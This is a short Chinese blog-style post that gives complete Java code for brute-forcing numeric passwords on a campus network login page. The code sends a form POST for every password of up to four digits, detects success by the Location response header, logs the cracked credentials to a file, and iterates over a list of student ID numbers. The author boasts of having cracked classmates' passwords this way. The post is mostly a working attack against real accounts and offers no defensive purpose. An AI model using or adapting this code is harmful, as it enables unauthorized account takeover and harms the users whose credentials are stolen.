注:以下破解思路及代碼源自我同學木子
1、先來看一個無任何安全措施的登錄系統的破解方法:每次模擬表單提交,若登錄成功,此時返回的報頭信息中有Location字段,登錄失敗無此字段,繼續模擬登錄。直到破解成功,本人成功破解部分同學校園網登錄密碼(純四位數字的)代碼如下:
- <span style="font-size:16px;">package demo.net;
-
- import java.io.IOException;
- import java.io.PrintWriter;
- import java.net.HttpURLConnection;
- import java.net.URL;
-
- import mine.util.io.TextFile;
-
- //暴力法破解簡單登錄系統:該系統無任何安全措施
- public class PostTest {
- String urlString = "登錄頁面的url";
-
- public PostTest() {
- }
-
- public PostTest(String urlString) {
- this.urlString = urlString;
- }
-
- // 提交一次用戶請求
- private boolean doPost(String user, String password) {
- boolean sucess = false;
- try {
- URL realUrl = new URL(urlString);
- HttpURLConnection conn = (HttpURLConnection) realUrl
- .openConnection();
- conn.setDoOutput(true);
- conn.setDoInput(true);
- conn.setInstanceFollowRedirects(false);
-
- // 提交表單,發送的數據是直接用Firebug截取的然後把用戶名,密碼部分換成參數
- PrintWriter out = new PrintWriter(conn.getOutputStream());
- out.print("要提交的表單信息");
- out.flush();
-
- // 如果登錄不成功,報頭中沒有Location字段,getHeaderField("Location") 返回null
- // 登錄成功,返回一個隨機的Location字段
- // System.out.println(conn.getHeaderFields());
- if (conn.getHeaderField("Location") != null) {
- sucess = true;
- }
- } catch (IOException e) {
- e.printStackTrace();
- }
- return sucess;
- }
-
- // 這是一個全排列算法, 對特定長度的密碼排列組合,把結果存入list
- // user:用戶名 , n:字符下標 , len:字符數組長度,也就是密碼長度
- private boolean createPassWord(String user, char[] str, int n, int len) {
- if (n == len) {
- String ps = new String(str);
- if (doPost(user, ps)) {
- // System.out.println("sucess:" + user + " : " + ps);
- TextFile.write("file/校園網用戶名及密碼.txt", true, "sucess:" + user
- + " : " + ps + "\n");
- return true;
- }
- return false;
- }
- for (int i = 0; i <= 9; i++) {
- str[n] = (char) (i + '0');
- if (createPassWord(user, str, n + 1, len))
- return true;
- }
- return false;
- }
-
- // 破解一個用戶的密碼
- public void test(String user) {
- for (int i = 0; i < 4; i++) {
- if (createPassWord(user, new char[i + 1], 0, i + 1))
- break;
- }
- }
-
- public static void main(String[] args) {
- PostTest pt = new PostTest();
- for (int i = 1; i <= 9; i++)
- pt.test("09050510" + i);
- for (int i = 10; i <= 31; i++)
- pt.test("0905051" + i);
- }
- }
- </span>
這個示例代碼中只破解密碼為4位或4位數字之內的密碼,大概破解一個用戶需要十分鐘。如果破解5、6...更長的密碼,破解時間將很長。